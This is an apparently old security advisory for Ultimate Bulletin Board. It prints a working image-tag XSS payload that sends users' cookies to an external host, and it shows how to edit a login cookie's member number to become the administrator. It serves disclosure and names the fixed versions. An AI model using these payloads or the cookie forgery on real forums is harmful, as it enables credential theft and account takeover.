COMMAND

    Ultimate Bulletin Board

SYSTEMS AFFECTED

    Ultimate Bulletin Board

PROBLEM

    Scott Ashman  found following.   If a  user has  info stored  in a
    cookie, replies to a message and  is using IE 4.0+ there is  a way
    for a hacker to trap his IP / user name / password / other  cookie
    information and  send them  to an  external source  using your UBB
    code with HTML *off*.  There is a way to do this by simply viewing
    a message as well, although it's obvious something is going on  as
    it involves a redirection.  Here's how it works.

    Apparently  the  [img][/img]  tag  allows non-spaced javascript to
    run.  You can write a line like this:

        [IMG]test"onerror="alert('test');[/IMG]

    This will run the javascript alert when the image 'test' fails  to
    load.

    Your cookies can hold both  the username and password but  is only
    accessable on the  http://sitename/cgi-bin/ path.   Script running
    on anything in cgi-path (replies) can access it.  So

        [IMG]test"onerror="alert(document.cookie);[/IMG]

    will pop up an alert box with the cookie info on a "reply" page as
    it's displayed in the thread review at the bottom.

    You  can  reassign   the  src  of   your  image  (this.src)   with
    document.cookie tacked on to point to an external page.  The weird
    thing  about  imgs  and  http  requests  in  general  is that your
    destination does not have to be an image.  So

        <a src="www.excite.com/index.html">

    will actually try to access index.html.  Hence, you can add actual
    passable  information  to  an  external  cgi  or whatever.  On the
    external page all you need to do is either watch the logs or  have
    the page  itself log  any URL  variables along  with IPs coming in
    from the request.

    The final line should read something like :

        [IMG]test"onerror="this.src='http://xxx.xxx.com/page.cfm?'+escape(document.cookie);
        [/IMG]

    Pasting this line  [no spaces/crlf] in  an mesage means  that  any
    user replying to anything in  that thread will cause their  cookie
    to be sent to an external source.

    'AlphaVersion' found the same.   Anyway, Scott describes a way  to
    retrieve  other  user's  usernames  and  passwords by putting some
    javascript betweenthe image  tags in a  message, however there  is
    an  easier  way  and  less  noticable  way to achieve this.  Atfer
    logging  in  2  cookies  are  sent (cut from netscapes cookies.txt
    file):

        host FALSE / FALSE 1013870132 login2451956.1435
        02-16-2001%2009%3A48%20AM&2451957.0948

        host FALSE / FALSE 1045406132 ubber2451956.1435
        alphaversion&<password>&AlphaVersion&45&00000036

    The second cookie consists of 5 parts, the username, the password,
    the name that will be displayed  when you post, a number of  which
    we are not sure what it  means and the member number, padded  with
    0's.

    It seems  that the  only part  that actually  gets checked  is the
    member  number.   So  if  you  send  the  saqme cookie, but with a
    different member number back (the  member numbers can be found  in
    the messages) you will be logged in as that member.  You can  then
    post messags, edit messages  and do whatever else  that particular
    user  can  do  on  the  board.   It  seems membver number 1 is the
    administrator, so if you edited netscapes cookie file to make  the
    cookie say this:

        host FALSE / FALSE 1045406132 ubber2451956.1435
        alphaversion&<password>&AlphaVersion&45&00000001

    you'd be able to edit and delete the messages from all users.   To
    make matters worse the board will replace the fake cookie with one
    that holds  the info  for the  user who's  member number  you sent
    back.  This includes the password.

    This has been tested on Ultimate Bulletin Board 6.0, Beta 7.8.

SOLUTION

    This issue has been resolved in version 5.47e, currently available
    in the UBB Members Area at Infopop.com.

    As for what  'Alphaversion' found Infopop  did release a  new beta
    version  to  fix  this  problem  and  have released other versions
    since, all containing the fix to this problem.  Their most current
    version of the Beta  release is 8.1, the  fix was in 7.9,  the bug
    was in 7.8 (at the moment of writing).